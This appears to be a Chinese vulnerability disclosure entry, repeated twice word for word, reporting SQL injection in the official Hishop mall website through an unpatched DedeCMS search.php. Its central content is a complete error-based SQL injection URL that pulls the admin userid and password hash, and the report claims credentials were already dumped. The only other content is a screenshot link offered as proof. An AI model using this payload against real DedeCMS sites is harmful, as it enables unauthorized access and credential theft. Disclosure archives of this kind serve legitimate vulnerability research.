VULHUB ™

### 简要描述： Hishop商城系统官方网站存在注入漏洞，已爆出用户名密码，后台未找到！！！ ### 详细说明： Hishop商城系统官方网站存在注入漏洞，网站使用dedecms系统，未打最新补丁，search.php文件可被注入。exp： plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a ### 漏洞证明： [<img src="https://images.seebug.org/upload/201302/2612555839e6c738a1681e0266abfc5e12ee492f.jpg" alt="QQ截图未命名.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/2612555839e6c738a1681e0266abfc5e12ee492f.jpg)

### 简要描述： Hishop商城系统官方网站存在注入漏洞，已爆出用户名密码，后台未找到！！！ ### 详细说明： Hishop商城系统官方网站存在注入漏洞，网站使用dedecms系统，未打最新补丁，search.php文件可被注入。exp： plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a ### 漏洞证明： [<img src="https://images.seebug.org/upload/201302/2612555839e6c738a1681e0266abfc5e12ee492f.jpg" alt="QQ截图未命名.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/2612555839e6c738a1681e0266abfc5e12ee492f.jpg)